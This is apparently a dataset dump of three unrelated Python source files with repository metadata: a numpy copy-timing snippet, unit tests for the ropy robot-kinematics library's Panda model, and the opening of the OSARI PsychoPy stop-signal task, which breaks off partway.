    # Same channel rotation expressed as whole-plane slice assignments.
    A[:,:,0] = A[:,:,1]
    A[:,:,2] = A[:,:,0]
    A[:,:,1] = A[:,:,2]
A = random.rand(dim,dim,3)
start = clock()
serial_copy(A)
finish = clock()
print 'Time for copy with loops:   ', finish - start,'s'
print
# Vectorized Copy
#----------------
A = random.rand(dim,dim,3)
start = clock()
vectorized_copy(A)
finish = clock()
print 'Time for vectorized copy:   ', finish - start,'s'
print
|
[
"[email protected]"
] | |
85614f4b027e1a236f12c98d6e2f0dbb9b39b778
|
2425ad0e81a695eb126b31f2ccf82dfd478851c3
|
/tests/test_ets.py
|
d8636cb441a212b3bfaa502b4e83c50a972f032f
|
[
"MIT"
] |
permissive
|
jhavl/ropy
|
62ab28297ae7e4ee6076009777d28aff98fdb2a2
|
38b12369530253a16c22ef1f5be0bcb75053ffd8
|
refs/heads/master
| 2021-01-07T20:39:00.899851 | 2020-11-29T10:35:24 | 2020-11-29T10:35:24 | 241,814,788 | 17 | 3 |
MIT
| 2020-04-29T05:36:43 | 2020-02-20T06:55:34 |
Python
|
UTF-8
|
Python
| false | false | 22,573 |
py
|
#!/usr/bin/env python3
"""
Created on Fri May 1 14:04:04 2020
@author: Jesse Haviland
"""
import numpy.testing as nt
import numpy as np
import ropy as rp
import unittest
import spatialmath as sm
class TestETS(unittest.TestCase):
    def test_panda(self):
        # Default Panda model: verify the canonical zero/ready joint
        # configurations and the gravity vector.
        panda = rp.Panda()
        qz = np.array([0, 0, 0, 0, 0, 0, 0])
        qr = panda.qr
        nt.assert_array_almost_equal(panda.qr, qr)
        nt.assert_array_almost_equal(panda.qz, qz)
        nt.assert_array_almost_equal(
            panda.gravity, np.array([[0], [0], [9.81]]))
def test_q(self):
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
q2 = [1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9]
q3 = np.expand_dims(q1, 0)
panda.q = q1
nt.assert_array_almost_equal(panda.q, q1)
panda.q = q2
nt.assert_array_almost_equal(panda.q, q2)
panda.q = q3
nt.assert_array_almost_equal(np.expand_dims(panda.q, 0), q3)
def test_getters(self):
panda = rp.Panda()
panda.qdd = np.ones((7, 1))
panda.qd = np.ones((1, 7))
panda.qdd = panda.qd
panda.qd = panda.qdd
def test_control_type(self):
panda = rp.Panda()
panda.control_type = 'v'
self.assertEqual(panda.control_type, 'v')
    def test_base(self):
        # The base-pose setter should accept both a raw 4x4 ndarray and an
        # SE3 instance, exposing the result as SE3 either way.
        panda = rp.Panda()
        pose = sm.SE3()
        panda.base = pose.A
        nt.assert_array_almost_equal(np.eye(4), panda.base.A)
        panda.base = pose
        nt.assert_array_almost_equal(np.eye(4), panda.base.A)
# def test_str(self):
# panda = rp.Panda()
# ans = '\nPanda (Franka Emika): 7 axis, RzRzRzRzRzRzRz, ETS\n'\
# 'Elementary Transform Sequence:\n'\
# '[tz(0.333), Rz(q0), Rx(-90), Rz(q1), Rx(90), tz(0.316), '\
# 'Rz(q2), tx(0.0825), Rx(90), Rz(q3), tx(-0.0825), Rx(-90), '\
# 'tz(0.384), Rz(q4), Rx(90), Rz(q5), tx(0.088), Rx(90), '\
# 'tz(0.107), Rz(q6)]\n'\
# 'tool: t = (0, 0, 0.103), RPY/xyz = (0, 0, -45) deg'
# self.assertEqual(str(panda), ans)
# def test_str_ets(self):
# panda = rp.Panda()
# ans = '[tz(0.333), Rz(q0), Rx(-90), Rz(q1), Rx(90), tz(0.316), '\
# 'Rz(q2), tx(0.0825), Rx(90), Rz(q3), tx(-0.0825), Rx(-90), '\
# 'tz(0.384), Rz(q4), Rx(90), Rz(q5), tx(0.088), Rx(90), '\
# 'tz(0.107), Rz(q6)]'
# self.assertEqual(str(panda.ets), ans)
def test_fkine(self):
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
q2 = [1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9]
q3 = np.expand_dims(q1, 0)
ans = np.array([
[-0.50827907, -0.57904589, 0.63746234, 0.44682295],
[0.83014553, -0.52639462, 0.18375824, 0.16168396],
[0.22915229, 0.62258699, 0.74824773, 0.96798113],
[0., 0., 0., 1.]
])
panda.q = q1
nt.assert_array_almost_equal(panda.fkine().A, ans)
nt.assert_array_almost_equal(panda.fkine(q2).A, ans)
nt.assert_array_almost_equal(panda.fkine(q3).A, ans)
nt.assert_array_almost_equal(panda.fkine(q3).A, ans)
self.assertRaises(TypeError, panda.fkine, 'Wfgsrth')
def test_fkine_traj(self):
panda = rp.Panda()
q = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
qq = np.c_[q, q, q, q]
ans = np.array([
[-0.50827907, -0.57904589, 0.63746234, 0.44682295],
[0.83014553, -0.52639462, 0.18375824, 0.16168396],
[0.22915229, 0.62258699, 0.74824773, 0.96798113],
[0., 0., 0., 1.]
])
TT = panda.fkine(qq)
nt.assert_array_almost_equal(TT[0].A, ans)
nt.assert_array_almost_equal(TT[1].A, ans)
nt.assert_array_almost_equal(TT[2].A, ans)
nt.assert_array_almost_equal(TT[3].A, ans)
def test_allfkine(self):
pm = rp.PandaMDH()
p = rp.Panda()
q = [1, 2, 3, 4, 5, 6, 7]
p.q = q
pm.q = q
p.allfkine()
r2 = pm.allfkine()
for i in range(7):
nt.assert_array_almost_equal(p.ets[i]._fk.A, r2[i].A)
p.allfkine(q)
for i in range(7):
nt.assert_array_almost_equal(p.ets[i]._fk.A, r2[i].A)
def test_jacob0(self):
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
q2 = [1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9]
q3 = np.expand_dims(q1, 0)
q4 = np.expand_dims(q1, 1)
ans = np.array([
[-1.61683957e-01, 1.07925929e-01, -3.41453006e-02,
3.35029257e-01, -1.07195463e-02, 1.03187865e-01,
0.00000000e+00],
[4.46822947e-01, 6.25741987e-01, 4.16474664e-01,
-8.04745724e-02, 7.78257566e-02, -1.17720983e-02,
0.00000000e+00],
[0.00000000e+00, -2.35276631e-01, -8.20187641e-02,
-5.14076923e-01, -9.98040745e-03, -2.02626953e-01,
0.00000000e+00],
[1.29458954e-16, -9.85449730e-01, 3.37672585e-02,
-6.16735653e-02, 6.68449878e-01, -1.35361558e-01,
6.37462344e-01],
[9.07021273e-18, 1.69967143e-01, 1.95778638e-01,
9.79165111e-01, 1.84470262e-01, 9.82748279e-01,
1.83758244e-01],
[1.00000000e+00, -2.26036604e-17, 9.80066578e-01,
-1.93473657e-01, 7.20517510e-01, -1.26028049e-01,
7.48247732e-01]
])
panda.q = q1
nt.assert_array_almost_equal(panda.jacob0(), ans)
nt.assert_array_almost_equal(panda.jacob0(q2), ans)
nt.assert_array_almost_equal(panda.jacob0(q3), ans)
nt.assert_array_almost_equal(panda.jacob0(q4), ans)
self.assertRaises(TypeError, panda.jacob0, 'Wfgsrth')
def test_hessian0(self):
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
q2 = [1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9]
q3 = np.expand_dims(q1, 0)
q4 = np.expand_dims(q1, 1)
ans = np.array([
[
[-4.46822947e-01, -6.25741987e-01, -4.16474664e-01,
8.04745724e-02, -7.78257566e-02, 1.17720983e-02,
0.00000000e+00],
[-6.25741987e-01, -3.99892968e-02, -1.39404950e-02,
-8.73761859e-02, -1.69634134e-03, -3.44399243e-02,
0.00000000e+00],
[-4.16474664e-01, -1.39404950e-02, -4.24230421e-01,
-2.17748413e-02, -7.82283735e-02, -2.81325889e-02,
0.00000000e+00],
[8.04745724e-02, -8.73761859e-02, -2.17748413e-02,
-5.18935898e-01, 5.28476698e-03, -2.00682834e-01,
0.00000000e+00],
[-7.78257566e-02, -1.69634134e-03, -7.82283735e-02,
5.28476698e-03, -5.79159088e-02, -2.88966443e-02,
0.00000000e+00],
[1.17720983e-02, -3.44399243e-02, -2.81325889e-02,
-2.00682834e-01, -2.88966443e-02, -2.00614904e-01,
0.00000000e+00],
[0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00]
],
[
[-1.61683957e-01, 1.07925929e-01, -3.41453006e-02,
3.35029257e-01, -1.07195463e-02, 1.03187865e-01,
0.00000000e+00],
[1.07925929e-01, -2.31853293e-01, -8.08253690e-02,
-5.06596965e-01, -9.83518983e-03, -1.99678676e-01,
0.00000000e+00],
[-3.41453006e-02, -8.08253690e-02, -3.06951191e-02,
3.45709946e-01, -1.01688580e-02, 1.07973135e-01,
0.00000000e+00],
[3.35029257e-01, -5.06596965e-01, 3.45709946e-01,
-9.65242924e-02, 1.45842251e-03, -3.24608603e-02,
0.00000000e+00],
[-1.07195463e-02, -9.83518983e-03, -1.01688580e-02,
1.45842251e-03, -1.05221866e-03, 2.09794626e-01,
0.00000000e+00],
[1.03187865e-01, -1.99678676e-01, 1.07973135e-01,
-3.24608603e-02, 2.09794626e-01, -4.04324654e-02,
0.00000000e+00],
[0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00]
],
[
[0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00],
[0.00000000e+00, -6.34981134e-01, -4.04611266e-01,
2.23596800e-02, -7.48714002e-02, -5.93773551e-03,
0.00000000e+00],
[0.00000000e+00, -4.04611266e-01, 2.07481281e-02,
-6.83089775e-02, 4.72662062e-03, -2.05994912e-02,
0.00000000e+00],
[0.00000000e+00, 2.23596800e-02, -6.83089775e-02,
-3.23085806e-01, 5.69641385e-03, -1.00311930e-01,
0.00000000e+00],
[0.00000000e+00, -7.48714002e-02, 4.72662062e-03,
5.69641385e-03, 5.40000550e-02, -2.69041502e-02,
0.00000000e+00],
[0.00000000e+00, -5.93773551e-03, -2.05994912e-02,
-1.00311930e-01, -2.69041502e-02, -9.98142073e-02,
0.00000000e+00],
[0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00]
],
[
[-9.07021273e-18, -2.77555756e-17, -2.77555756e-17,
-1.11022302e-16, -2.77555756e-17, 0.00000000e+00,
-2.77555756e-17],
[-1.69967143e-01, -1.97756387e-17, 4.11786040e-17,
-1.48932398e-16, -5.07612940e-17, -8.38219650e-17,
-4.90138154e-17],
[-1.95778638e-01, 1.66579116e-01, -1.38777878e-17,
1.04083409e-17, -1.38777878e-17, 3.46944695e-18,
0.00000000e+00],
[-9.79165111e-01, -3.28841647e-02, -9.97525009e-01,
-4.16333634e-17, -1.14491749e-16, 1.38777878e-17,
-6.24500451e-17],
[-1.84470262e-01, 1.22464303e-01, -3.97312016e-02,
7.41195745e-01, -2.77555756e-17, 1.12757026e-16,
2.77555756e-17],
[-9.82748279e-01, -2.14206274e-02, -9.87832342e-01,
6.67336352e-02, -7.31335770e-01, 2.08166817e-17,
-6.07153217e-17],
[-1.83758244e-01, 1.27177529e-01, -3.36043908e-02,
7.68210453e-01, 5.62842325e-03, 7.58497864e-01,
0.00000000e+00]
],
[
[1.29458954e-16, -1.11022302e-16, 8.67361738e-17,
-4.16333634e-17, 5.55111512e-17, 2.77555756e-17,
5.55111512e-17],
[-9.85449730e-01, -6.36381327e-17, -1.02735399e-16,
-1.83043043e-17, -5.63484308e-17, 8.08886307e-18,
1.07112702e-18],
[3.37672585e-02, 9.65806345e-01, 8.32667268e-17,
-2.55871713e-17, 1.07552856e-16, 2.08166817e-17,
-5.20417043e-18],
[-6.16735653e-02, -1.90658563e-01, -5.39111251e-02,
-6.59194921e-17, -2.77555756e-17, 2.38524478e-17,
-4.16333634e-17],
[6.68449878e-01, 7.10033786e-01, 6.30795483e-01,
-8.48905588e-02, 0.00000000e+00, 3.46944695e-17,
2.77555756e-17],
[-1.35361558e-01, -1.24194307e-01, -1.28407717e-01,
1.84162966e-02, -1.32869389e-02, 2.77555756e-17,
-2.08166817e-17],
[6.37462344e-01, 7.37360525e-01, 5.99489263e-01,
-7.71850655e-02, -4.08633244e-02, 2.09458434e-02,
0.00000000e+00]
],
[
[0.00000000e+00, -6.59521910e-17, -1.31033786e-16,
-1.92457571e-16, 1.54134782e-17, -7.69804929e-17,
1.11140361e-17],
[0.00000000e+00, -2.77555756e-17, 7.15573434e-17,
1.65666092e-16, 1.38777878e-17, -8.67361738e-18,
3.46944695e-17],
[0.00000000e+00, -1.98669331e-01, 8.67361738e-18,
-1.46584134e-16, 6.02816408e-17, -3.12250226e-17,
6.11490025e-17],
[0.00000000e+00, -9.54435515e-01, 4.51380881e-02,
1.38777878e-17, 1.08420217e-16, 3.46944695e-18,
6.24500451e-17],
[0.00000000e+00, -2.95400686e-01, -1.24639152e-01,
-6.65899738e-01, -4.85722573e-17, -5.20417043e-18,
-5.55111512e-17],
[0.00000000e+00, -9.45442009e-01, 5.96856167e-02,
7.19317248e-02, 6.81888149e-01, -2.77555756e-17,
1.04083409e-17],
[0.00000000e+00, -2.89432165e-01, -1.18596498e-01,
-6.35513913e-01, 5.24032975e-03, -6.51338823e-01,
0.00000000e+00]
]
])
panda.q = q1
nt.assert_array_almost_equal(panda.hessian0(), ans)
nt.assert_array_almost_equal(panda.hessian0(q2), ans)
nt.assert_array_almost_equal(panda.hessian0(q3), ans)
nt.assert_array_almost_equal(panda.hessian0(q4), ans)
nt.assert_array_almost_equal(panda.hessian0(J0=panda.jacob0(q1)), ans)
nt.assert_array_almost_equal(panda.hessian0(
q1, J0=panda.jacob0(q1)), ans)
# self.assertRaises(ValueError, panda.hessian0)
self.assertRaises(ValueError, panda.hessian0, [1, 3])
self.assertRaises(TypeError, panda.hessian0, 'Wfgsrth')
self.assertRaises(
ValueError, panda.hessian0, [1, 3], np.array([1, 5]))
self.assertRaises(TypeError, panda.hessian0, [1, 3], 'qwe')
def test_manipulability(self):
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
q2 = [1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9]
q3 = np.expand_dims(q1, 0)
q4 = np.expand_dims(q1, 1)
ans = 0.006559178039088341
panda.q = q1
nt.assert_array_almost_equal(panda.manipulability(), ans)
nt.assert_array_almost_equal(panda.manipulability(q2), ans)
nt.assert_array_almost_equal(panda.manipulability(q3), ans)
nt.assert_array_almost_equal(panda.manipulability(q4), ans)
# self.assertRaises(ValueError, panda.manipulability)
self.assertRaises(TypeError, panda.manipulability, 'Wfgsrth')
self.assertRaises(
ValueError, panda.manipulability, [1, 3], np.array([1, 5]))
self.assertRaises(TypeError, panda.manipulability, [1, 3], 'qwe')
def test_jacobm(self):
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
q2 = [1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9]
q3 = np.expand_dims(q1, 0)
q4 = np.expand_dims(q1, 1)
ans = np.array([
[1.27080875e-17],
[2.38242538e-02],
[6.61029519e-03],
[8.18202121e-03],
[7.74546204e-04],
[-1.10885380e-02],
[0.00000000e+00]
])
panda.q = q1
nt.assert_array_almost_equal(panda.jacobm(), ans)
nt.assert_array_almost_equal(panda.jacobm(q2), ans)
nt.assert_array_almost_equal(panda.jacobm(q3), ans)
nt.assert_array_almost_equal(panda.jacobm(q4), ans)
nt.assert_array_almost_equal(panda.jacobm(J=panda.jacob0(q1)), ans)
# self.assertRaises(ValueError, panda.jacobm)
self.assertRaises(TypeError, panda.jacobm, 'Wfgsrth')
self.assertRaises(ValueError, panda.jacobm, [1, 3], np.array([1, 5]))
self.assertRaises(TypeError, panda.jacobm, [1, 3], 'qwe')
self.assertRaises(
TypeError, panda.jacobm, [1, 3], panda.jacob0(q1), [1, 2, 3])
self.assertRaises(
ValueError, panda.jacobm, [1, 3], panda.jacob0(q1),
np.array([1, 2, 3]))
def test_jacobev(self):
pdh = rp.PandaMDH()
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
panda.q = q1
nt.assert_array_almost_equal(panda.jacobev(), pdh.jacobev(q1))
def test_jacob0v(self):
pdh = rp.PandaMDH()
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
panda.q = q1
nt.assert_array_almost_equal(panda.jacob0v(), pdh.jacob0v(q1))
def test_jacobe(self):
pdh = rp.PandaMDH()
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
panda.q = q1
nt.assert_array_almost_equal(panda.jacobe(), pdh.jacobe(q1))
nt.assert_array_almost_equal(panda.jacobe(q1), pdh.jacobe(q1))
    def test_init(self):
        # ETS construction from a list of ELinks; base_link/ee_link accept
        # either an ELink instance or an integer index.
        l0 = rp.ELink()
        l1 = rp.ELink()
        r = rp.ETS([l0, l1], base=sm.SE3.Rx(1.3), base_link=l1, ee_link=l0)
        r.base_link = l1
        r.base_link = 0
        r.ee_link = 1
        # Non-list and non-ELink arguments must be rejected with TypeError.
        with self.assertRaises(TypeError):
            rp.ETS(l0, base=sm.SE3.Rx(1.3))
        with self.assertRaises(TypeError):
            rp.ETS([1, 2], base=sm.SE3.Rx(1.3))
def test_dict(self):
panda = rp.PandaURDF()
panda.to_dict()
wx = rp.wx250s()
wx.to_dict()
def test_fkdict(self):
panda = rp.PandaURDF()
fkd = panda.fk_dict()
for i in range(len(panda.ets)):
nt.assert_array_almost_equal(
panda.ets[i]._fk.t,
fkd['links'][i]['t'])
def test_qlim(self):
panda = rp.PandaURDF()
self.assertEqual(panda.qlim.shape[0], 2)
self.assertEqual(panda.qlim.shape[1], panda.n)
def test_manuf(self):
panda = rp.PandaURDF()
self.assertIsInstance(panda.manuf, str)
def test_complex(self):
l0 = rp.ELink([rp.ET.Ttx(0.1), rp.ET.TRx()])
l1 = rp.ELink([rp.ET.Ttx(0.1), rp.ET.TRy()], parent=l0)
l2 = rp.ELink([rp.ET.Ttx(0.1), rp.ET.TRz()], parent=l1)
l3 = rp.ELink([rp.ET.Ttx(0.1), rp.ET.Ttx()], parent=l2)
l4 = rp.ELink([rp.ET.Ttx(0.1), rp.ET.Tty()], parent=l3)
l5 = rp.ELink([rp.ET.Ttx(0.1), rp.ET.Ttz()], parent=l4)
r = rp.ETS([l0, l1, l2, l3, l4, l5])
r.q = [1, 2, 3, 1, 2, 3]
ans = np.array([
[-0., 0.08752679, -0.74761985, 0.41198225, 0.05872664, 0.90929743],
[1.46443609, 2.80993063, 0.52675075, -0.68124272, -0.64287284,
0.35017549],
[-1.04432, -1.80423571, -2.20308833, 0.60512725, -0.76371834,
-0.2248451],
[1., 0., 0.90929743, 0., 0., 0.],
[0., 0.54030231, 0.35017549, 0., 0., 0.],
[0., 0.84147098, -0.2248451, 0., 0., 0.]
])
nt.assert_array_almost_equal(r.jacob0(), ans)
# def test_plot(self):
# panda = rp.Panda()
# panda.q = panda.qr
# e = panda.plot(block=False)
# e.close()
# def test_plot_complex(self):
# l0 = rp.ET.TRz()
# l1 = rp.ET.Ttx()
# l2 = rp.ET.TRy()
# l3 = rp.ET.Ttz(1)
# l4 = rp.ET.TRx()
# E = rp.ETS([l0, l1, l2, l3, l4])
# e = E.plot(block=False)
# e.step(0)
# e.close()
# def test_teach(self):
# l0 = rp.ET.TRz()
# l1 = rp.ET.Ttx()
# l2 = rp.ET.TRy()
# l3 = rp.ET.Ttz(1)
# l4 = rp.ET.TRx()
# E = rp.ETS([l0, l1, l2, l3, l4])
# e = E.teach(block=False, q=[1, 2, 3, 4])
# e.close()
# def test_plot_traj(self):
# panda = rp.Panda()
# q = np.random.rand(7, 3)
# e = panda.plot(block=False, q=q, dt=0)
# e.close()
def test_control_type2(self):
panda = rp.Panda()
panda.control_type = 'p'
with self.assertRaises(ValueError):
panda.control_type = 'z'
# def test_plot_vellipse(self):
# panda = rp.Panda()
# panda.q = panda.qr
# e = panda.plot_vellipse(block=False, limits=[1, 2, 1, 2, 1, 2])
# e.close()
# e = panda.plot_vellipse(
# block=False, q=panda.qr, centre='ee', opt='rot')
# e.step(0)
# e.close()
# with self.assertRaises(TypeError):
# panda.plot_vellipse(vellipse=10)
# with self.assertRaises(ValueError):
# panda.plot_vellipse(centre='ff')
# def test_plot_fellipse(self):
# panda = rp.Panda()
# panda.q = panda.qr
# e = panda.plot_fellipse(block=False, limits=[1, 2, 1, 2, 1, 2])
# e.close()
# e = panda.plot_fellipse(
# block=False, q=panda.qr, centre='ee', opt='rot')
# e.step(0)
# e.close()
# with self.assertRaises(TypeError):
# panda.plot_fellipse(fellipse=10)
# with self.assertRaises(ValueError):
# panda.plot_fellipse(centre='ff')
# def test_plot_with_vellipse(self):
# panda = rp.Panda()
# panda.q = panda.qr
# e = panda.plot(block=False, vellipse=True)
# e.close()
# def test_plot_with_fellipse(self):
# panda = rp.Panda()
# panda.q = panda.qr
# e = panda.plot(block=False, fellipse=True)
# e.close()
# def test_plot2(self):
# panda = rp.Panda()
# panda.q = panda.qr
# e = panda.plot2(block=False, name=True)
# e.close()
# def test_plot2_traj(self):
# panda = rp.Panda()
# q = np.random.rand(7, 3)
# e = panda.plot2(block=False, q=q, dt=0)
# e.close()
# def test_teach2(self):
# panda = rp.Panda()
# panda.q = panda.qr
# e = panda.teach(block=False)
# e.close()
# e2 = panda.teach2(block=False, q=panda.qr)
# e2.close()
# Run the test suite when this file is executed directly.
if __name__ == '__main__':
    unittest.main()
|
[
"[email protected]"
] | |
a29353f3b6c573e8101559c8fa7f56856e8ef1e3
|
6e04394dec05a3b838defdd11157705ae15912c8
|
/OSARI_time_v1.8.py
|
d6642c6444bd1797ea03370529aa2be08474c3ae
|
[] |
no_license
|
RebeccaHirst/OSARI
|
ae0f68761a43722324bef297cbecc11c1b69a12e
|
18129873133b79b19521630fb683aeba37ce523d
|
refs/heads/master
| 2021-07-20T01:38:41.372828 | 2020-07-24T07:56:42 | 2020-07-24T07:56:42 | 246,411,541 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 37,589 |
py
|
"""
Open-Source Anticipated Response Inhibition (OSARI)
Created in PsychoPy v3.1.2
Written by: Rebecca J Hirst [1] Rohan Puri [2]
Edited by: Jason L He [3]
[1] Trinity College Institute of Neuroscience, Trinity College Dublin
[2] University of Tasmania
[3] John Hopkins School of Medicine
Mail to Author: rj.hirst at hotmail.co.uk
Version 1.3;
Create Date 04062019;
Last edited 190720
References:
Guthrie, M. D., Gilbert, D. L., Huddleston, D. A., Pedapati, E. V., Horn, P. S., Mostofsky, S. H., & Wu, S. W. (2018).
Online Transcranial Magnetic Stimulation Protocol for Measuring Cortical Physiology Associated with Response Inhibition.
Journal of Visualized Experiments, (132), 1-7. http://doi.org/10.3791/56789
He, J. L., Fuelscher, I., Coxon, J., Barhoun, P., Parmar, D., Enticott, P. G., & Hyde, C. (2018).
Impaired motor inhibition in developmental coordination disorder. Brain and Cognition, 127(August),
23-33. http://doi.org/10.1016/j.bandc.2018.09.002
Input:
3 csv files:
practiceGoConditions.csv
practiceMixedConditions.csv
TestConditions.csv
In all csv files each row corresponds to a trial, so number of rows will correspond to the number of trials in a block.
0 = Go 1 = Stop
Output:
4 output files in format:
OSARI_ExpH_123_OSARI_2020_Jul_19_1307.log
OSARI_ExpH_123_OSARI_2020_Jul_19_1307.csv
OSARI_ExpH_123_OSARI_2020_Jul_19_1307.psydat
OSARI_ExpH_123_OSARI_2020_Jul_19_1307.txt
For details on psydat and log files see
https://www.psychopy.org/general/dataOutputs.html#:~:text=PsychoPy%20data%20file%20(.-,psydat),python%20and%2C%20probably%2C%20matplotlib.
Data is contained in the .txt and .csv files. The .txt file saves the main details of interest but csv stores further details.
Block: block number
TrialType: Practice or real trial
    Trial: Trial number
Signal: 0 = Go
1 = Stop
Response: What the participants response was ( 0 = no lift, 1 = lift)
RT: Lift time of participants relative to the starting line (to 2 decimal places)
SSD: Stop Signal Distance (relative to starting line) if the trial was a stop trial.
Note:
Make sure the resolution of "testMonitor" in monitor centre matches actual screen resolution
"""
# --------------------------------------------------------------
# Import modules
# --------------------------------------------------------------
from __future__ import absolute_import, division
from psychopy import gui, visual, core, data, event, logging
import numpy as np # whole numpy lib is available, prepend 'np.'
import os # handy system and path functions
import sys # to get file system encoding
import pyglet
import math
from psychopy.hardware import keyboard
# Run relative to this script's directory so stimulus/conditions files resolve.
_thisDir = os.path.dirname(os.path.abspath(__file__))
os.chdir(_thisDir)
# set the keyboard
# Keyboard watcher (PsychoPy hardware backend); polling only begins after kb.start().
kb = keyboard.Keyboard(bufferSize=10, waitForStart=True)
# --------------------------------------------------------------
# Task parameters
# This section presents users with options to collect participant data
# and set task parameters using a set of Graphic User Interfaces (GUI).
# --------------------------------------------------------------
# Participant information
# Fields shown in the participant-information dialog. Ticking
# 'Default parameters?' skips the extended task-parameter dialog below.
expInfo={'Participant ID':0000,
         'Age (Years)':00,
         'Sex':['F', 'M', 'Prefer not to say'],
         'Default parameters?':True}
expName='OSARI'
dlg=gui.DlgFromDict(dictionary=expInfo, title='Participant Information',
                    tip={'Default parameters?':
                         'This will run the task with no additional options'})
# Abort cleanly if the participant cancelled the dialog.
if dlg.OK ==False: core.quit()
expInfo['date'] = data.getDateStr()
# Task Information
# Here we have two dictionaries, "taskInfo_brief" contains parameters that can be set by the user if they do not
# want the default parameters - if the user wants to set parameters beyond this see "taskInfo" and set in the code.
# Defaults: staircased SSD in 25 ms steps between 50 and 775 ms, 15 cm bar,
# 3 test blocks, no spaceship graphic, full-screen window.
taskInfo_brief={'Practice trials': True,
                'Count down':True,
                'Trial by trial feedback':True,
                'Method':['staircase', 'fixed'],
                'Trial order':['random', 'sequential'],
                'Step size (s)':0.025,
                'Lowest SSD (s)':0.05,
                'Highest SSD (s)': 0.775,
                'Total bar height (in cm)':15,
                'Number of Test Blocks': 3,
                'Spaceship':False,
                'Full Screen':True}
#Check if user ticked for use of default parameters. If not present in depth task parameter options.
if not expInfo['Default parameters?']:
    dlg=gui.DlgFromDict(dictionary=taskInfo_brief, title='Experiment Parameters',
        tip={
            'Count down':'Do you want a countdown before the bar starts filling?',
            'Trial by trial feedback':'Do you want participants to receive trial to trial feedback',
            'Method':'What SSD method do you want?',
            'Trial order':'Do you want trials to be in a random order or in the order you have set in the conditions .csv file [sequential]',
            'Step size (s)':'What do you want the step size to be in ms - e.g., 0.025 is 25ms',
            'Lowest SSD (s)':'The lowest the SSD can go in ms - e.g., 0.05 is 5ms',
            'Highest SSD (s)':'The highest the SSD can go in ms - e.g., 0.775 is 775ms',
            'Total bar height (in cm)':'The total height of the bar',
            'Number of Test Blocks':'Number of test blocks [i.e. number of times trials in .csv file will be repeated. to set trial number and proportion of stop vs. go adapt the .csv file]',
            'Spaceship':'Do you want to run this with a moving target image (i.e. a spaceship) ?',
            'Full Screen':'Do you want to run the task with Full Screen - recommended'})
    if dlg.OK ==False: core.quit()
else:
    #parameters with multiple options need their default selecting
    # (the GUI stores list-valued fields as lists until a choice is made)
    taskInfo_brief['Trial order']='random'
    taskInfo_brief['Method']='staircase'
# "Bar_top" is how many cm above the centre of the screen (x = 0 y = 0) the top of the bar will be drawn.
Bar_top=taskInfo_brief['Total bar height (in cm)']/2
# "Target_pos" is where the target line will be drawn. This is currently hard coded as 80%
# of the total bar length (i.e. total bar height is multiplied by .8)
Target_pos=(.8*taskInfo_brief['Total bar height (in cm)'])-Bar_top
# Additional parameters beyond "taskInfo_brief" can be set here (but not in GUI)
taskInfo={'Bar base below fixation (cm)':Bar_top,
'Bar width (cm)':3,
'Bar top above fixation (cm)':Bar_top,
'Target line width (cm)':5,
'Target line above fixation (cm)':Target_pos,
'rise velocity (cm/sec)':15,
'StopS start pos. (ms)':500,
'trial length (max trial duration in seconds)':1,
'StopS start pos. (seconds)':.5}
# "trial_length" is the max duration of a trial in seconds i.e. the amount of time it
# takes the filling bar to fill to the top.
trial_length=taskInfo['trial length (max trial duration in seconds)']
bar_height = taskInfo_brief['Total bar height (in cm)']
#The time taken to get to the target line i.e. 80% of the total trial time
Target_time=(.8*taskInfo['trial length (max trial duration in seconds)'])
# --------------------------------------------------------------
# Hardware parameters
# This section presents users with options for hardware
# parameters. For example if they want to send triggers etc.,
#
# --------------------------------------------------------------
#Set up the window in which we will present stimuli
# NOTE(review): 'testMonitor' must match the real screen resolution in
# Monitor Center (see module docstring), otherwise cm units are wrong.
win = visual.Window(
    fullscr=taskInfo_brief['Full Screen'],
    winType='pyglet',
    monitor='testMonitor',
    color=[-1,-1,-1],
    colorSpace='rgb',
    blendMode='avg',
    mouseVisible = False,
    allowGUI=False,
    size=(1440, 900))
# --------------------------------------------------------------
# Data output parameters
# This section specifies the details of where the data will be
# saved, including filenames ect. Two folders are created "data"
# contains all task related data and "logfiles" which contain
# additional details on the task parameters and techy details
# such as if any frames were dropped.
#
# --------------------------------------------------------------
#Check if a "data" folder exists in this directory, and make one if not.
if not os.path.exists(_thisDir + os.sep +'data/'):
print('Data folder did not exist, making one in current directory')
os.makedirs(_thisDir + os.sep +'data/')
#Create the name of the output file. "Output" is the output file.
Output = _thisDir + os.sep + u'data/OSARI_%s_%s_%s' % (expInfo['Participant ID'],
expName, expInfo['date'])
with open(Output+'.txt', 'a') as b:
b.write('block trialType trial signal response ssd rt\n')
#Check if a "logfiles" folder exists in this directory, and make one if not.
if not os.path.exists(_thisDir + os.sep +'logfiles/'):
print('Logfile folder did not exist, making one in current directory')
